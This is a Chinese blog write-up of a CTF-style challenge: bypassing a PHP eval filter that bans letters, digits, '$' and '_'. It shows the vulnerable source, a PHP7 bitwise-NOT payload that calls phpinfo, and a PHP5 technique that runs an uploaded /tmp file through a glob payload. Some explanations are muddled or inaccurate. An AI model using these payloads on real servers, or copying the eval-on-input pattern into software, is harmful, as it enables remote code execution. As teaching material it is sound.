无字母数字webshell之命令执行

欸嘿aq

已于 2024-08-12 21:42:36 修改

阅读量771

点赞数 25

文章标签： android

于 2024-08-12 21:39:45 首次发布

本文链接：https://blog.csdn.net/qq_51502737/article/details/141122522

版权

文章目录

源码
解决方法

源码

<?php
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>35){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
        die("NO.");
    }
    eval($code);
}else{
    highlight_file(__FILE__);
}

从代码可看出这道题的限制：

webshell长度不超过35位
除了不包含字母数字，还不能包含$和_

因为$不能使用了，所以我们无法构造PHP中的变量。所以，如何解决这个问题？

解决方法

PHP7下的实现

在撰写博客时，描述 PHP 7 新特性的动态函数调用语法可以采用以下方式：

PHP 7 新特性：动态函数调用

PHP 7 引入了许多新特性，其中之一便是对动态函数调用的支持。在 PHP 7 之前，我们无法直接通过变量或表达式来调用函数。但是，PHP 7 打破了这一限制，允许开发者以一种更加灵活和动态的方式执行函数。

动态函数调用语法

在 PHP7 中可以使用以下语法来动态调用函数：

(${expression})();

这里的 ${expression} 可以是任何计算结果为函数名的 PHP 表达式。这意味着你可以在运行时决定要调用哪个函数，从而大大增加了代码的灵活性。

使用 URL 编码动态调用函数

一个有趣的例子是使用 URL 编码来动态指定函数名。例如，如果想动态调用 phpinfo() 函数，但出于某种原因不能直接使用函数名，可以将 phpinfo 转换为 URL 编码形式 %8F%97%8F%96%91%99%90，然后使用它来调用函数：

(${'%8F%97%8F%96%91%99%90'})(); // 动态调用 phpinfo 函数

在Linux中~为取反
这种方法虽然不常见，但它展示了 PHP 7 在动态调用方面的灵活性。
通过('phpinfo')();来执行函数
使用(~%8F%97%8F%96%91%99%90)();得到：
在这里插入图片描述

PHP5下的实现

在shell下利用. 来执行任意脚本

利用点命令（.）执行文件

在 Linux 系统中，点命令（.）是一个强大的工具，它允许执行当前 shell 环境下某个文件中的命令。例如，如果正在使用 bash shell，使用 . file 的方式可以执行 file 文件中的命令，而不需要给予该文件执行权限（x 权限）。

如何获取目标服务器上的文件？

在某些场景下，我们可能需要在目标服务器上执行一个我们可控的文件。一个常见的方法是通过上传功能。许多 web 应用程序允许用户上传文件，这些文件通常会被保存在服务器的临时文件夹中，例如 /tmp 目录。默认情况下，这些临时文件的命名模式可能是 phpXXXXXX，其中 X 是随机生成的大小写字母。

使用通配符执行临时文件

一旦我们上传了文件，接下来的挑战是如何执行这些以 phpXXXXXX 命名的临时文件。由于文件名的不确定性，我们可以使用 Linux 的 glob 通配符来匹配这些文件：

*：代表任意数量（包括零个）的任意字符。
?：代表单个任意字符。

因此，我们可以将 /tmp/phpXXXXXX 这样的文件名表示为 /*/?????????? 或 /???/??????????，这样就可以匹配到以 php 开头，后面跟随六个随机字符的临时文件。
但是我们会发现这样(通常情况下)并不能争取的执行文件，而是会报错，原因就是这样匹配到的文件太多了，系统不知道要执行哪个文件。

我们可以使用如下payload：
. /???/????????[@-[]
最后的[@-[]表示ASCII在 @ 和 [ 之间的字符，也就是大写字母，所以最后会执行的文件是tmp文件夹下结尾是大写字母的文件。由于PHP生成的tmp文件最后一位是随机的大小写字母，所以我们可能需要多试几次才能正确的执行我们的代码。

web.html

 
<!DOCTYPE html>
<html lang="en">
 
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
 
<body>
    <form action="web.php" method="post" enctype="multipart/form-data">
        <input type="file" name="upload_file" id="">
        <input type="submit" value="submit">
    </form>
</body>

web,php

<?php
if(isset($_GET['code'])){
   $code = $_GET['code'];
   if(strlen($code)>35){
       die("Long.");
   }
   if(preg_match("/[A-Za-z0-9_$]+/",$code)){
       die("NO.");
   }
   eval($code);
}else{
   highlight_file(__FILE__);
}